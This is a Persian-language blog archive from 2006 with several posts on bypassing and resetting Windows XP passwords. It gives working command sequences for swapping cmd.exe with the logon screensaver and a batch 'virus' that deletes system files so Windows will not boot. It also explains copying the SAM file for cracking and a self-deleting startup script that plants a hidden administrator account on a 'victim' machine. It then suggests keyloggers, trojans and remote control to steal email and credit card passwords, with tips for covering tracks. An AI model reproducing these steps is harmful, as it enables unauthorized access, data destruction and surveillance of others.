تغییر پسورد ویندوز xp

اينو هم امتحان کنيد !!شايد بشه!؟؟

1-به Start > Run برويد و فرمان CMD را تايپ كرده Enter را بزنيد.
2-در پنجره ي باز شده اين فرمان‌ها را بدون عيب و نقص اجرا كنيد :

cd\
cd\windows\system32
mkdir hackpass
copy logon.scr hackpass \logon.scr
copy cmd.exe hackpass \cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

با اين كار در حقيقت پرامت داس را بجايScreen Saver به ويندوز معرفي مي‌كنيد و اين كار، ويندوز را ناپايدار مي‌كند.
فقط توصيه ميکنم دستورهاي del و rename خيلي سريع انجام شوند (ميتان کل پروسه را در يک فايل bat قرار دهيد)  اين دو خط دستور را بايد در عرض كمتر 2 ثانيه انجام دهيد تا فايل هاي مورد نظر توسط ويندوز جايگزين نشوند
3-كامپيوتر را Restart نماييد.
4-Screen Saver ويندوز را فعال نماييد يا منتظر بمانيد تا خود بخود اجرا شود.خواهيد ديد كه، بجاي Screen Saver، خط فرمان DOS ظاهر مي‌شود.

-اكنون اگر مثلا User name آن ariya بود و خواستيد پسورد آن را به xyxy تغيير دهيد، اين فرمان را در پرامپت DOS انجام دهيد :

net user ariya xyxy

به اين ترتيب پسورد به 222 تغيير خواهد يافت.نكته: حتما بعد از پايان كار دو فايلي را كه در پوشه ‌ hackpass کپي کرديد را به جاي اول برگردانيد.


+ نوشته شده در 2006/3/31 ساعت 23:38 توسط محمد ملکشاهی  | 

 یه ویروس باحال برای سوزاندن ویندوز ( )

قصد دارم ترفندی خطرناک (!) را به شما معرفی کنیم که با استفاده از آن می توانید بدون نیاز به نرم افزار خاصی و تنها با استفاده از Notepad ویندوز ویروس خطرناکی بسازید. با اجرای این ویروس ، کامپیوتر مورد نظر Reset شده و دیگر ویندوز آن بالا نمیاید! لازم به ذکر است که این ترفند تنها جنبه آموزشی داشته و هر گونه استفاده نابجا از آن به عهده خود فرد میباشد.

ابتدا Notepad ویندوز را باز کنيد. سپس اين عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس فايل رو با پسوند Bat. ذخیره کنيد.

+ نوشته شده در 2006/3/28 ساعت 2:24 توسط محمد ملکشاهی  | 

چگونه به ویندوز اکس پی دیگران حمله کنید؟

در این مقاله فرض می کنیم که فایل سیستم ویندوز NTFS است .
برای این کار چند روش وجود دارد :
روش اول :
در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید ...
 این روش ساده است اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!
به سراغ روش دوم میرویم :
روش دوم :
1- ابتدا یک فلاپی Bootable می سازیم .
2- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)
3-  خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .
4- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :
%Windir%\System32\Config\
Example : c:\windows\system32\config
در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.
( نکته : در ویندوز 2000 با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :
5- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .
 روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
1- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام hassan مدیر سیستم باشد):
C:\Documents and Settings\hassan\Start Menu\Programs\Startup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر hassan یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور 123 وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام Administrator و کلمه عبور 123 می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم :
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید دانلود کنید.
روش پنجم 
تا مرحله 4 را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف - ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
:c
ب - Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32
پ - یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت - حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث - حالا فایل logon.scr را پاک می کنیم :
del logon.scr
ج - حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :
net user hassan 123 /add
این دستور یک حساب کاربری با نام hassan و کلمه عبور 123 ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup hassan administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123
این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به 123 تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
نتیجه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و ...
دوم این که یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و ... و وب سایت های که سر می زند و حتی کلماتی که چت می کند و ... را بدانید .
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین ...
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
توصیه های مهم :
1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
4- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
5- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
6- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
7- هر چند وقت یکبار پسورد خود را عوض کنید.
8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید.
+ نوشته شده در 2006/3/22 ساعت 19:26 توسط محمد ملکشاهی  | 

برداشتن پسورد ورود به ویندوز XP

یکی از مشکلات ویندوز xp راه نفوذ به آن در صورت فراموش کردن پسورد می باشد.همانطور که میدانید ویندوز از امکانات جالبی برخوردار میباشد که یکی از آن ها امکان جالب switch user می باشد که می تواند محیط را برای کار user های مختلف فراهم کند.حالا اگر این پسورد را فراموش کردیم چه باید بکنیم؟در این حالت چند راه نفوذ است و آن اینست که در هنگام ظاهر شدن منوی کاربران در ابتدا دو بار کلیدهای ctrl+alt+dalete را فشار دهید وسپس در قسمت نام، کلمه Administrator را تایپ کرده و قسمت password را خالی بگذارید و OK را بزنید در این حالت وارد سیستم می شوید حال اگر در هنگام نصب ویندوز xp برای admin پسورد گذاشته باشند چه کار یاید کرد؟ برای این کار هنگام بالا آمدن ویندوز کلید F8 را زده و سپس بسته به نیاز خود یکی از گزینه های safe mode را انتخاب کنید.بعد از وارد شدن به ویندوز در منو Start کلیک کنید و سپس گزینه Run را انتخاب کرده و در جای خالی عبارت Control userpasswords2 را تایپ کنید،حال پنجره باز شده دارای ۲ tab به نام های users & advanced میباشد.tab users را انتخاب کرده و تیک گزینه: user must enter a user name and password to use this computer را بردارید.با برداشتن تیک این گزینه دیگر هنگام ورود به ویندوز از شما پسورد گرفته نمی شود . حالا با استفاده از گزینه Remove میتوان نام کاربری را حذف کرد. همچنین با استفاده از گزینه properties میتوان میزان دسترسی کاربران به ویندوز را تعیین کرد. 

+ نوشته شده در 2006/3/11 ساعت 20:21 توسط محمد ملکشاهی  |